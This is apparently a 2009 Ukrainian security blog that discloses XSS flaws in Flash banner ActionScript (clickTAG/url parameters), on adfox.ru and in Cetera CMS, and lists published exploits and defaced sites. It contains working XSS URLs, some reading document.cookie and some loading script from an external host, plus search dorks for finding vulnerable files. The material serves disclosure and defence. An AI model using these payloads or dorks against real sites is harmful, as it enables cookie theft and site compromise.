Websecurity - Веб безпека

Продовжу тему, яку я підняв в 2008 році в своїй статті XSS уразливості в 215000 флеш файлах. Тоді я виявив сотні тисяч флешек уразливих до Cross-Site Scripting атак. Після попередньої статті, опублікованої 12.11.2008, я продовжив дослідження і виявив, що набагато більше флешек - мільйони флеш файлів - вразливі до XSS атак. Як флешек у різних глобальних і локальних банерних системах, так і флешек на окремих сайтах.

Уразливий ActionScript код.

Як я вже зазначав в попередній статті, уразливість в наступному AS коді. Причому як з вказанням другого параметра в фунції getURL (target), так і без нього:

getURL(_root.clickTAG, "_blank");

Але, як показали мої дослідження, в різніх флешках (на різних сайтах та банерних системах) використовується різні параметри для передачі адреси сайта у флешку. Окрім clickTAG також використовуються url та інші параметри.

getURL(_root.url, "_blank");

Атака відбувається через передачу XSS коду flash файлу в clickTAG, url чи іншому параметрі:

http://site/flash.swf?clickTAG=javascript:alert('XSS')

http://site/flash.swf?url=javascript:alert('XSS')

Також існують флешки, що використовують два параметри, зокрема clickTAG і TargetAS, з наступним AS кодом:

getURL(_root.clickTAG, _root.TargetAS);

Атака відбувається з використанням параметрів clickTAG і TargetAS:

http://site/flash.swf?clickTAG=javascript:alert('XSS')&TargetAS=

При кліку на флешку відбувається передача функції getURL рядку, що переданий флешці через відповідний параметр. Таким чином може виконатися JavaScript код, що був переданий флешці. Тобто це strictly social XSS.

Поширенність проблеми.

Уразливість наявна в ActionScript коді для підрахунку кліків у флеш банерах. І враховуючи, що подібний код використовується вже багато років в різних банерних системах Інтернету (в тому числі поширені інструкції по розробці флеш банерів з використанням вразливого AS коду), то проблема достатньо поширена. Наприклад, на banner.kiev.ua я зареєструвався ще в 2000 році, і, наскільки я пам’ятаю, вже тоді в них на сайті були дані рекомендації з використанням вразливого AS коду.

Тобто проблема пов’язана з неякісними рекомендаціями по розробці флеш банерів з можливістю підрахунку кліків. І вона стосується мільйонів флеш банерів у Мережі.

Подібні уразливості наявні в багатьох банерних системах, як глобальних, так і локальних. Зокрема дані уразливості я виявив в системах phpAdsNew, OpenAds та OpenX (на багатьох сайтах на даних движках), а також в банерній системі www.banner.kiev.ua та в інших банерних системах Уанета і Рунета.

Потенційно взразливих флешек в Інтернеті дуже багато (за даними Google):

filetype:swf inurl:clickTAG

Результатів приблизно 3960000. 12.11.2008 їх було приблизно 215000. Зростання в 18,42 рази за цей час.

filetype:swf inurl:url

Результатів приблизно 4050000. 12.11.2008 їх було приблизно 996000. Зростання в 4,07 рази за цей час.

В сумі виходить, що приблизно 8010000 (понад 8 мільйонів) флешек потенційно вразливі до XSS атак. Не всі з цих флешек вразливі, але чимало з них. І це лише флеш файли проіндексовані Гуглом, а реально їх може бути набагато більше.

Середи них приблизно 12400 + 275 gov-сайтів - сайтів державних установ різних країн.

Зазначу, що деякі з цих флешек використовують методику №1 для захисту від XSS, що наведена нижче. Але це невеликий відсоток флешек - в основному вони використовують вразливий AS код.

До речі, подібну Strictly social XSS уразливість я виявив 15.03.2009 в плагіні WP-Cumulus для WordPress (в файлі tagcloud.swf).

filetype:swf inurl:tagcloud.swf

Результатів приблизно 34000000. Тобто ще 34 мільйони флешек потенційно вразливих до XSS атак . Додайте 34 млн. до 8 млн. і вийде 42 мільйони вразливих флешек!

Особливості роботи в різних браузерах.

При вказаному у флешці target = “_blank” до кукісів не можна дістатися в Internet Explorer (зокрема IE6), Mozilla та Google Chrome. Зате можна дістатися до кукісів в Firefox 3, Opera 9.52 і можливо в інших браузерах.

Також у випадку, якщо вказаний target = “_blank”, JS-код не спрацьовує у браузерах IE6 та Google Chrome.

При невказаному target, або при вказаному target іншому ніж “_blank” (в тому числі через параметр TargetAS, при його використанні у флешці), JS-код спрацьовує в усіх браузерах. І в усіх браузерах можна дістатися до кукісів.

Приклади уразливих флешек.

Серед сайтів з уразливими до XSS флешками є server.cpmstar.com (атака через параметр clickTAG):

• alert(’XSS’)

Серед gov-сайтів приведу приклад флешки на www.fatherhood.gov (атака через параметр clickTag):

• alert(’XSS’)

Приклад уразливої флешки на www.banner.kiev.ua (атака через параметр url):

• alert(’XSS’)

Приклад уразливої флешки на www.wie-man-sieht.net, що дозволяє дістатися до кукісів в усіх браузерах (атака через параметр url):

• alert(’XSS’)
• alert(document.cookie)

Приклад уразливої флешки на www.adspeed.com, що дозволяє дістатися до кукісів в усіх браузерах (атака через параметри clickTAG і TargetAS):

• alert(’XSS’)
• alert(document.cookie)

Захист флешек від XSS атак.

Щоб не допустити даних XSS атак через флешки потрібно не використовувати вразливий AS код і потрібно використати один з наступних методів.

1. Замість вразливого AS коду можна використати більш надійний код. Наприклад код, що наводиться на сайті Adobe - Designer’s Guide: Building Macromedia Flash Banners with Tracking Capabilities.

on (release) {
if (clickTAG.substr(0,5) == "http:") {
getURL(clickTAG);
}
}

Це код на кнопку. При використанні кода на кадр, то для кнопки button код буде наступним:

_root.button.onRelease = function () {
if (clickTAG.substr(0,5) == "http:") {
getURL(clickTAG);
}
}

Але цей метод не захищає від підміни URL, що дозволить провести атаки редирекції на довільні (в тому числі зловмисні) сайти. Тому краще використати більш надійний AS код.

2. Використати прямий URL у флешці (http://site), без використання параметру clickTAG.

3. Якщо потрібно підраховувати кліки, то можна використати URL на банерну систему (http://banner/click?id=1), що редиректне на потрібний сайт.

Наприклад, в своїй системі MustLive Banner System безпосередьно в інтерфейсі я рекомендую використовувати для флеш банерів вищеназвані методи №2 і №3, тому й даної проблеми з XSS через флеш файли в ній немає. Так що слідкуйте за своїми флешками і не допускайте в них подібних уразливостей.

31.07.2009

У грудні, 08.12.2008, я знайшов Cross-Site Scripting та Cookie Poisoning уразливості на проекті http://adfox.ru (банерна мережа). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.12.2009

Уразливості на домені https://login.adfox.ru.

XSS:

• alert(document.cookie)

Cookie Poisoning:

Можлива persistent XSS атака через Cookie Poisoning. При встановленні XSS коду в значенні кукіса amacsAccount, можна виконати код при кожному відвідуванні сторінки https://login.adfox.ru. Це можна зробити або через вищезгадану XSS дірку, або через дірки в браузерах.

Дані уразливості вже виправлені.

В даній добірці експлоіти в веб додатках:

• Kloxo 5.75 (24 Issues) Multiple Remote Vulnerabilities (деталі)
• Host Directory PRO 2.1.0 Remote Change Admin Password Exploit (деталі)
• Web Directory PRO Remote Database Backup Vulnerability (деталі)
• Host Directory PRO 2.1.0 Remote Database Backup Vulnerability (деталі)
• Web Directory PRO (admins.php) Change Admin Password Exploit (деталі)
• SuperCali PHP Event Calendar Arbitrary Change Admin Password Exploit (деталі)
• OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit (деталі)
• Kjtechforce mailman b1 (dest) Remote Blind SQL Injection Exploit (деталі)
• Kjtechforce mailman b1 (code) SQL Injection Delete Row Vulnerability (деталі)
• Pixelactivo 3.0 (Auth Bypass) Remote SQL Injection Vulnerability (деталі)
• Pixelactivo 3.0 (idx) Remote SQL Injection Vulnerability (деталі)
• PeaZIP <= 2.6.1 Compressed Filename Command Injection Exploit (деталі)
• Joomla Component com_school 1.4 (classid) SQL Injection Vulnerability (деталі)
• fipsCMS Light 2.1 (db.mdb) Remote Database Disclosure Vulnerability (деталі)
• USER OPTIONS CHANGER EXPLOIT MiniTwitter v0.2-Beta (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.pv.poltava.ua (хакером Cyb3rking) - 08.12.2009, зараз сайт вже виправлений адмінами
• http://baterfly.triadas.com.ua (хакером SALDIRAY) - 16.12.2009, зараз сайт вже виправлений адмінами
• http://www.websites.od.ua (хакером SALDIRAY) - 12.12.2009, зараз сайт не працює (немає його контенту)
• http://wolf-clan.com (хакерами з kasper security-Team) - причому спочатку сайт був взломаний 01.12.2009 kasper security-Team, а 12.12.2009 взломаний Mafia Egypt. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
• http://ucheba.in.ua (хакером SALDIRAY) - 09.12.2009, зараз сайт вже виправлений адмінами

Виявлені численні уразливості безпеки в Mozilla Firefox і SeaMonkey.

Уразливі продукти: Mozilla Firefox 3.0, Firefox 3.5, SeaMonkey 2.0.

Численні пошкодження пам’яті при розборі HTML і медіа-форматів, атаки NTLM-релеїнга, підміна адреси, підвищення привілеїв, витік інформації.

• Mozilla Foundation Security Advisory 2009-65 (деталі)
• Mozilla Foundation Security Advisory 2009-66 (деталі)
• Mozilla Foundation Security Advisory 2009-67 (деталі)
• Mozilla Foundation Security Advisory 2009-68 (деталі)
• Mozilla Foundation Security Advisory 2009-69 (деталі)
• Mozilla Foundation Security Advisory 2009-70 (деталі)
• Mozilla Foundation Security Advisory 2009-71 (деталі)

В даній добірці уразливості в веб додатках:

• Re: MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface (деталі)
• TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit (деталі)
• Vpopmail/QmailAdmin User’s Quota Multiple Integer Overflows (деталі)
• BLIND SQL INJECTION exploit (GET var ‘AlbumID’) RTWebalbum 1.0.462 (деталі)
• Claroline v.1.8.11 Cross-Site Scripting (деталі)
• HP OpenView Products Shared Trace Service Denial of Service (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS) (деталі)
• MULTIPLE SQL INJECTION VULNERABILITIES Shutter v-0.1.1 (деталі)
• MULTIPLE CODE INJECTION VULNERABILITIES TUENTI SPAIN (деталі)
• activeCollab XSS and Full Path Disclosure (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах DM Albums та Google Analytics. Для котрих з’явилися експлоіти. DM Albums - це плагін для створення фото альбомів та галерей, Google Analytics - це плагін для інтергації з системою Google Analytics.

• Численні уразливості в WordPress DM Albums Plugin (деталі)
• Google Analytics plugin for Wordpress - XSS Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

29.10.2009

У березні, 01.03.2009, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі Cetera CMS. Які виявив на офіційному сайті системи http://www.cetera.ru.

Раніше я вже писав про уразливість в Cetera CMS.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

16.12.2009

Insufficient Anti-automation:

http://site/support/default.php?project=1

Відсутній захист від автоматизованих запитів (капча).

XSS:

http://site/support/default.php?project=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E
http://site/support/default.php?project=1&lang=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E
http://site/support/default.php?project=1&name=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E

Та через заголовки User-Agent, Accept-Language та Referer:

Уразливі Cetera CMS v2.9.0 та попередні версії. Розробники в себе на сайті на Cetera CMS виправили XSS уразливості, але не виправили Insufficient Anti-automation.

MustLive Security Pack v.1.0.8
Copyright © MustLive 2005-2009
Last updated: 16.12.2009
http://mlfun.org.ua
http://websecurity.com.ua

В Security Pack входить:

1) Захист від Спамботів

2) Захист від взлому: phpBB security fix #1

3) Захист від взлому: IPB security fix #1

4) Захист від взлому: IPB security fix #2

5) Захист від взлому: WordPress security fix #1

6) Захист від взлому: WordPress security fix #2

7) Захист від взлому: IPB security fix #3

8) Захист від взлому: IPB security fix #4

9) Захист від взлому: IPB security fix #5

Скачати пакет в розділі MustLive Security Pack.

Деталі на форумі.

В нову версію Security Pack увійшли виправлення Cross-Site Scripting уразливостей в Invision Power Board для версій IPB 1.x, 2.x та 3.0.x.

В даній добірці експлоіти в веб додатках:

• Online Grades & Attendance 3.2.6 Multiple Local File Inclusion Vulns (деталі)
• WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability (деталі)
• Joomla Component Seminar 1.28 (id) Blind SQL Injection Exploit (деталі)
• Podcast Generator <= 1.2 unauthorized Re-Installation Remote Exploit (деталі)
• EgyPlus 7ml <= 1.0.1 (Auth Bypass) SQL Injection Vulnerability (деталі)
• My Mini Bill (orderid) Remote SQL Injection Vulnerability (деталі)
• Podcast Generator <= 1.2 GLOBALS[] Multiple Remote Vulnerabilities (деталі)
• WebEyes Guest Book v.3 (yorum.asp mesajid) SQL Injection Vulnerability (деталі)
• PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities (деталі)
• Joomla Component com_mosres Multiple SQL Injection Vulnerabilities (деталі)
• Movie PHP Script 2.0 (init.php anticode) Code Execution Vulnerability (деталі)
• Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability (деталі)
• Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability (деталі)
• OCS Inventory NG 1.02 Remote File Disclosure Vulnerability (деталі)
• Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit (деталі)